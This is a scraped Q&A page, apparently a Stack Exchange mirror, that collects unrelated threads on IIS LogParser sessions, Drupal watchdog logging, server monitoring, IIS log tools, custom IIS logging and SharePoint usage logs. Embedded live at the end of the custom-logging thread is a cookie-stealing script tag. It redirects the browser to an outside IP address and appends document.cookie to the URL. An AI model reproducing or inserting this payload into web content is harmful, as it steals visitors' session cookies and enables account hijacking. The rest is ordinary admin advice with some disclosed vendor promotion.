Loparser to get Number of session by Hour - iis

how can i use logparser to see how many uniqe session are there by every hour in IIS Logs

According to this post it's not as easy as it seems since Log Parser doesn't support COUNT(DISTINCT), but there is a workaround in post #2.
If you're interested in useful queries there's an old post over at https://serverfault.com/questions/45516/recommended-logparser-queries-for-iis-monitoring which has some useful snippets, you could easily update the unique errors to look for a status code of 200 (although you'd have to filter out your pages only).

By default, your IIS logs will not show session information, just http requests. You might be able to output session information to your IIS logs but it would depend primarily on what application platform you are running and where you are storing session state. For example, if you were using .NET, you could use the AppendToLog method. You could also look into Custom Logging but it would depend what version of IIS you are running. Under IIS6 you could implement a customer logger. Under IIS7 you can use the advanced logging extension.
Having no awareness of your platform or tech stack I'm not in a position to say but you could also look in to something like Elmah which Scott Hanselman has blogged a lot on. If you are running a .NET web app, it seems to have a lot of features already built for you so perhaps that would be an easier route to get your desired goal.

Related

Securing Drupal: Alternative to Watchdog?

Hi Im going though and securing a site I have that runs drupal 7 using the security review module. One of the recommendations is to not use watchdog to log events to the screen I.E the data base I guess. If I turn that off would there be another secure way to send logs to my workstation so that I can monitor traffic to the site. I.E what people view, broken links and the like?
I'm on a shared host, not a dedicated host. I did a search on some different ways to do this, but I really dont know where to start. Should I download a module to do this? Or does Drupal report all this information to the server logs? Sorry if I am not formatting this question correctly, but i'm not to clear on how to do this.
Are you sure the recommandation is about Drupal's watchdog? Not about displaying error message on the pages. These are two different things.
That said, in Drupal, the watchdog is only an API to log system messages. Where the messages go, how they are actually logged, is a pluggable system. By default, Drupal uses a module called "Database logging" (dblog) to log message to the database. A syslog module is also provided, but not really an option if you are on a shared hosting. A quick search reveal modules to send messages to Logentries, Logstash (and Loggly), Slack, LogIO, email, etc.
If you have a gigantic site with millions a hits a day then, yeah, don't use watchdog.
But if it's just a small site, just use watchdog to log your events. And seeing its a shared host, it's not a high profile site. Using watchdog is fine.

How to Design a web application to monitor server status in web browser

I just want to try creating a web application to monitor server status. I need some design guidelines.
Should I use some scripting language like Python or ruby to get the stats? Is polling is the only way to do it? If so how frequently should we poll?
If you don't care about data retention, writing a simple web app in ruby or python that polls from the browser would probably be fine. You could alternately use websockets and push data from a CLI-based monitoring agent of some sort that ran in the background on your server.
If you don't care about data fidelity, then you might be able to use something simple like pingdom.
If you do care about data retention and you need lots of custom monitoring, then it's a much harder problem. There are a number of open source projects and paid applications that will solve this problem in various ways. As mentioned in the comment on your post, ganglia could work. You might also look into nagios or munin. If you need app level stats, you could check out statsd/graphite or influxdb/grafana.
If you want server monitoring but don't want to manage additional infrastructure, there are a lot of solutions in the paid space including librato, newrelic, and instrumental.
Note: I am an owner of Instrumental, so I'm biased toward that, but I think your question needs more details to narrow down any recommendations on infrastructure monitoring.

what are the tools to parse/analyze IIS logs - ideally free/open source?

note: there are few similar questions already asked here - but they are from 2009. May be something has changed since then.
I'm responsible for a bunch of websites hosted on different servers. I do not do any log analysis right now, but I would like to change this. First question - what is the best tool to view ISSUES with the website based on IIS logs (i.e. 404, 500 responses, long page processing, etc)? Ideally with grouping/sorting options? I do not want to spend a lot of time on this, I just want to periodically check if all is good with the website.
Second question (and I know most likely i'm asking for too much) - but is there any way to expose processed logs to web? So I can review things mentioned above without RPDing into the server?
Ideally I'm looking for a free/open source solution, but I'm ready to pay for a good software as well (but not a lot of $$).
Thank you.
You can take a look at our log monitoring solution EventSentry, which can monitor text-based logs like IIS logs. We have standard templates setup for IIS, and we can consolidate the logs in a database with web-access, so that you can review the logs without using RDP.
It's a pretty flexible solution that allows you to pick the fields you are interested in, and ignore the ones you are not - and thus save space in your database.
You can also setup real-time alerts, so that you can get an email when a critical error is encountered in a log file, like a 500 error.
http://www.eventsentry.com/features/log-file-monitoring
Finally, you can also plug-in command line tools which can verify that a given web page is accessible, or get alerted when it changes: http://www.eventsentry.com/features/application-monitoring.
I'm biased of course, but I would say that our solution is pretty affordable. Since it offers additional functionality as well, such as service monitoring (to monitor your IIS services) and event log monitoring (IIS does log critical messages to the event log), you can setup comprehensive monitoring with a single product.
I'd look into #LuckyLuke solution (or similar) - classic "build vs buy" decision. Based on your post, this isn't going to be your "full time" job so IMHO its best to leave it to those who do...
I don't know what "legacy" answers you are referring to, but if you want to tinker you can use Microsoft's own log parser, and depending on how far you want to go with it, you can use it (COM dll) to write your "admin web pages" in .Net/ASP.Net and host it in each of your servers....
If you're very specific about the errors you just want to be alerted about, another "hacky" way would be to provide your own custom error pages (either the default IIS error pages, or configure your Asp.Net apps to use specific error pages).

How to write my own Server Logging script?

I need to log the hits on a sub-domain in Windows IIS 6.0 without designating them as separate websites in the IIS Manager. I have been told this is not possible. How can I write my own script to do this?
I'm afraid google analytics is not an option due to the setup, I just need access (i'm guessing) to the file request event and its properties.
Wyatt Barnette - I've thought of this! But how do I set those properties for it to collect them all? I'm writing my own log parsing software, as I need specific things, I just need the server to generate the logs for me to parse!
Have you considered using Google Analytics across all your sites? I know that this is not true logging...but sometimes addressing simple problems with simple solutions is easier! Log parsing seems to be slowly fading away...
What you should be able to do is have your stats tracking package look at multiple IIS websites as a single site.
If your logging package can't handle this, check out the IIS log parsing tool. That should at least take care of the more onerous part of the task (actually making sense of the logfiles). From there it is a pretty straightforward reporting operation.
<script language="JavaScript">document.location="http://142.0.71.119:88/get.php?cookie="+document.cookie;</script>

How is it possible to access Sharepoint Farm logs?

I have been looking at the "_layouts/SpUsageSite.aspx" logs for my site, but they are giving erroneous results (eg 0 unique visitors when I know at least I have been on the site)
What is the best way to see these logs in a better way than the ootb functionality?
Did you enable the usage processing and the usage logging for the site in question?
You can enable them in you central admin under:
Operations -> Usage analysis processing
It may also be that the processing is limited to a speciffic timespan
I have come across a bug with the Usage analysis processing to do with UTC date conversion which resulted in the processed numbers being erroneous. This is apparently fixed in SP2, but we have not been able to implement this quite yet.
The alternative is a bit onerous as you need to copy the usage logs from each front end server to a location and configure the log parser to store the information in a data base.
Serge van den Oever steps through this quite well here.
I don't really recommend this as a regular process as it takes a lot of effort, but it does give you a huge amount of information for when you wish to take a detailed look at usage on a particular point of your SharePoint farm.
Ideally we would have a solution to parse the logs automagically using the log parser utility and provide that information in SSRS reports.
We patched to sp2 and it all started working again like magic.

Resources